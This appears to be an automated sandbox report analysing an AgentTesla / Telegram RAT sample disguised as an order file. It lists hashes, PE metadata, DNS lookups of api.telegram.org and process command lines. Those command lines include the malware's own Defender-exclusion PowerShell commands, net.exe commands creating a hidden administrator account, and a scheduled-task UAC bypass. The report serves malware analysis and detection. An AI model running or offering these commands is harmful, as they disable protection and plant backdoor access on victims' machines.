                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053248..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..Process ID: 1472..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053248..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..**********************..Command start time: 20220114053557..**********************..PS>TerminatingError(Add-MpPreference):
                              C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              Process:C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):844800
                              Entropy (8bit):7.921306694709134
                              Encrypted:false
                              SSDEEP:12288:cLDVY3Knt0gGBliisULw6oyz+RQqCjw6sfCUlTvvVEiZ2FQ6Ke06K8LwH:cFxtOvi7UM6p/qb1ndvn/6Lw
                              MD5:8B974D65BF7E334D75F57027821AC628
                              SHA1:F3CCC2D15A771715E6653D470F955F7095E3CD17
                              SHA-256:C2628ACD6B807FACD37A0B0DB1068F80FA2C87702D6A687445A9EC1DC3BC2421
                              SHA-512:668DDAED399D33F32C4BDCCB22D77E9EDF27A707BE8F0901417D566125D30D90BD44E039B03548C9C31D17297BCD2CC3AB5D712CBD918B71EAB1B53CFDA70E11
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 19%
                              Reputation:unknown
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..`...|........... ........@.. .......................@............`.....................................J........|................... ..........8............................................ ............... ..H............text....`... ...b.................. ..`.rsrc....|.......~...d..............@..@.reloc....... ......................@..@........................H........X..T)......k...h................................................*V!..H.....s.........*J.(.....(....}....*Z..{"....X}".....}....*n.{(...-...s)...}(....{(...*b.{"...-...($...*..}....*b.{"...-...('...*..}....*..{....o....,...(4...*.{.......%..5...s6.....g...o!...&*..{....o....,..(7....1".(8...*.{.......%..9...s:...o;...&*.r...ps<....#...r...ps<....%....s=....&...*..(>...*..(>....s....}.....{.....}.....{.....} ...*Z.{....-..*.{....{....*N.(.....{.....}....*Z.{....-..*.{

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.921306694709134
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:#NEW ORDER FOR JANUARY 2022.exe
                              File size:844800
                              MD5:8b974d65bf7e334d75f57027821ac628
                              SHA1:f3ccc2d15a771715e6653d470f955f7095e3cd17
                              SHA256:c2628acd6b807facd37a0b0db1068f80fa2c87702d6a687445a9ec1dc3bc2421
                              SHA512:668ddaed399d33f32c4bdccb22d77e9edf27a707be8f0901417d566125d30d90bd44e039b03548c9c31d17297bcd2cc3ab5d712cbd918b71eab1b53cfda70e11
                              SSDEEP:12288:cLDVY3Knt0gGBliisULw6oyz+RQqCjw6sfCUlTvvVEiZ2FQ6Ke06K8LwH:cFxtOvi7UM6p/qb1ndvn/6Lw
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..`...|........... ........@.. .......................@............`................................

                              File Icon

                              Icon Hash:00828e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0x4c8089
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                              Time Stamp:0xAF0CF1CB [Wed Jan 24 10:45:31 2063 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:v4.0.30319
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]

                              Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc7f80 | 0x4a | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xca000 | 0x7cf2 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc7fca | 0x38 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                              Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc608f | 0xc6200 | False | 0.937400187303 | data | 7.93856030024 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xca000 | 0x7cf2 | 0x7e00 | False | 0.498387896825 | data | 6.40175519141 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd2000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0980041756627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

Name | RVA | Size | Type | Language | Country
IBC | 0xca0c4 | 0x7736 | data | |
RT_VERSION | 0xd17fc | 0x4f6 | data | |

                              Imports

DLL | Import
mscoree.dll | _CorExeMain

                              Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Microsoft Corporation. All rights reserved.
Assembly Version | 16.0.0.0
InternalName | Microsoft.VisualStudio.Language.Intellisense.dll
FileVersion | 16.6.255.35071
CompanyName | Microsoft Corporation
LegalTrademarks |
Comments | Microsoft Visual Studio Editor Platform
ProductName | Microsoft Visual Studio
ProductVersion | 16.6.255+ff88cb6b00.RR
FileDescription | Microsoft.VisualStudio.Language.Intellisense
OriginalFilename | Microsoft.VisualStudio.Language.Intellisense.dll

                              Network Behavior

                              Network Port Distribution

                              UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2022 05:34:59.250521898 CET | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Jan 14, 2022 05:34:59.269767046 CET | 53 | 56534 | 8.8.8.8 | 192.168.2.4

                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 14, 2022 05:34:59.250521898 CET | 192.168.2.4 | 8.8.8.8 | 0x8a6b | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)

                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 05:34:59.269767046 CET | 8.8.8.8 | 192.168.2.4 | 0x8a6b | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)

                              Code Manipulations

                              Statistics

                              CPU Usage

                              Memory Usage

                              High Level Behavior Distribution

                              Behavior

                              System Behavior

                              General

                              Start time:05:32:26
                              Start date:14/01/2022
                              Path:C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                              Imagebase:0xdf0000
                              File size:844800 bytes
                              MD5 hash:8B974D65BF7E334D75F57027821AC628
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, Author: Joe Security
                              Reputation:low

                              General

                              Start time:05:32:30
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:high

                              General

                              Start time:05:32:30
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:05:32:31
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:32
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:05:32:33
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:33
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:34
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:05:32:34
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:35
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" localgroup users "user" /add
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:36
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:05:32:36
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 localgroup users "user" /add
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:37
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\net.exe" localgroup administrators "user" /del
                              Imagebase:0xed0000
                              File size:46592 bytes
                              MD5 hash:DD0561156F62BC1958CE0E370B23711B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:05:32:38
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:38
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\net1.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\net1 localgroup administrators "user" /del
                              Imagebase:0x1380000
                              File size:141312 bytes
                              MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:39
                              Start date:14/01/2022
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                              Imagebase:0x7ff6eb840000
                              File size:51288 bytes
                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:39
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                              Imagebase:0x10a0000
                              File size:185856 bytes
                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:40
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:41
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              General

                              Start time:05:32:42
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              General

                              Start time:05:32:42
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:43
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:43
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              General

                              Start time:05:32:44
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:51
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                              Imagebase:0x1823aae0000
                              File size:173672 bytes
                              MD5 hash:2778AE0EB674B74FF8028BF4E51F1DF5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:32:53
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Imagebase:0xfd0000
                              File size:45160 bytes
                              MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                              General

                              Start time:05:32:54
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                              Imagebase:0xbf0000
                              File size:844800 bytes
                              MD5 hash:8B974D65BF7E334D75F57027821AC628
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 19%, ReversingLabs

                              General

                              Start time:05:32:56
                              Start date:14/01/2022
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                              Imagebase:0x7ff6eb840000
                              File size:51288 bytes
                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:33:02
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              General

                              Start time:05:33:02
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:05:33:03
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                              Imagebase:0xfb0000
                              File size:844800 bytes
                              MD5 hash:8B974D65BF7E334D75F57027821AC628
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000003.773583087.0000000004B9C000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, Author: Joe Security
